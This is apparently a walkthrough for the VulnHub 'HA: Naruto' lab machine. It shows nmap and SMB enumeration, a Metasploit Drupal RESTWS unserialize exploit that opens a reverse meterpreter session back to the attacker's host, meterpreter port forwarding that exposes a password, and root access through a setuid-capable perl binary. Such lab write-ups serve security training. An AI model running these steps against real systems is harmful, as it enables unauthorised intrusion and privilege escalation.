HA NARUTO (VULNHUB)

LINK: https://drive.google.com/file/d/1RK6ZdBstyw886OmpExUItK4_soMLMUxD/view?usp=sharing

root@kali:~/.ssh# nmap -A 192.168.222.152
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 08:18 GMT
Nmap scan report for 192.168.222.152
Host is up (0.00017s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:8d:8b:ee:53:c1:b1:86:9a:a8:fd:2a:af:82:bd:24 (RSA)
| 256 e6:86:b7:62:d8:de:17:8e:df:df:ec:43:42:74:e5:21 (ECDSA)
|_ 256 0f:ef:c7:41:10:b3:07:0f:f5:aa:8b:85:64:37:5d:c3 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Naruto
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:94:1A:4F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2019-10-28T01:18:32-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-10-28T08:18:32
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms 192.168.222.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

Enumeration:

on browser

http://192.168.222.152/

on terminal

root@kali:~/.ssh# smbclient -L \\192.168.222.152
Enter WORKGROUP\root’s password:
Anonymous login successful

Sharename Type Comment
——— —- ——-
Naruto Disk public share, no need to enter username and password
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
——— ——-

Workgroup Master
——— ——-
WORKGROUP UBUNTU

root@kali:~/.ssh# smbclient //192.168.222.152/Naruto
Enter WORKGROUP\root’s password:
Anonymous login successful
Try “help” to get a list of possible commands.

smb: \> ls
. D 0 Fri Oct 11 06:50:12 2019
.. D 0 Fri Oct 11 07:39:22 2019
uzumaki.txt N 1736 Fri Oct 11 06:50:12 2019

20509264 blocks of size 1024. 15842584 blocks available

smb: \> get uzumaki.txt
getting file \uzumaki.txt of size 1736 as uzumaki.txt (1695.1 KiloBytes/sec) (average 1695.3 KiloBytes/sec)

smb: \>

root@kali:~/.ssh# cat uzumaki.txt
Naruto and Sakura successfully pass the Bell test, prompting Tsunade to place the duo in the newly formed Team Kakashi, led by Kakashi. Heading back to the village, Naruto and Sakura decide to go to Ramen Ichiraku to eat, asking Kakashi to treat them. Jiraiya appears and tells Kakashi that the Akatsuki are on the move, reminding Kakashi that Naruto is under his care once more before leaving. Kakashi tells Naruto and Sakura that he needs to go as well, leaving the pair alone. As there’s only two of them now, Naruto asks whether their dinner would count as a date, to which Sakura states it would if Naruto pays for ramen; Naruto however, does not have enough to cover both of their meals.

Meanwhile, “Gara” manages to use his sand to ensnare Deidara’s left arm and crushes it with Sand Binding Coffin, much to the Suna shinobi’s delight. Realising “Gara”‘s ultimate defense is the sand from his gourd, which is infused with chakra, Deidara changes his strategy, attempting to destroy Sunagakure instead. Baki fears that the fight will draw Shukaku out of “Gara”, thus endangering the lives of everyone in Suna. KankurĂ… tells Baki not to worry, as he knows “Gara” will never harm anyone in the village. He reminisces about the time when “Gara” shared his dream to be Kazekage, in order to form a bond with everyone in the village and be someone loved and respected, crediting his newfound perspective on life to Naruto. Seeing the progress of the battle, Sunagakure makes the necessary precautions to evacuate the villagers and support their Kazekage. Deidara, realising that they are going to join the fight as well, proceeds to use the last of his Explosive Clay to create an explosive C3 bomb, which he drops on the village.

now lon browser

http://192.168.222.152/gara/

now on another terminal

msf5 > use exploit/unix/webapp/drupal_restws_unserialize

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set rhosts 192.168.222.152

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set targeturi /gara

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set lhost 192.168.222.132

msf5 exploit(unix/webapp/drupal_restws_unserialize) > set VHOST 192.168.222.132
VHOST => 192.168.222.132

msf5 exploit (unix/webapp/ drupal_restws_unserialize) > exploit

meterpreter> shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@ubuntu:/var/www/html/gara$ netstat -antp

www-data@ubuntu:/var/www/html/gara$ exit

meterpreter> portfwd add -l 8080 -p 8080 -r 127.0.0.1

now on browser

http://127.0.0.1:8080

we get

User: yashika
Password: raj@123

back to meterpreter

meterpreter > shell

www-data@ubuntu:/var/www/html/gara$ su yashika

password : raj@123

yashika@ubuntu:/var/www/html/gara$ getcap -r / 2>/dev/null

yashika@ubuntu:/var/www/html/gara$ cd /home/yashika

yashika@ubuntu:~$ ./perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’

# id

# cd /root

# ls

# cat final.txt

@SAKSHAM DIXIT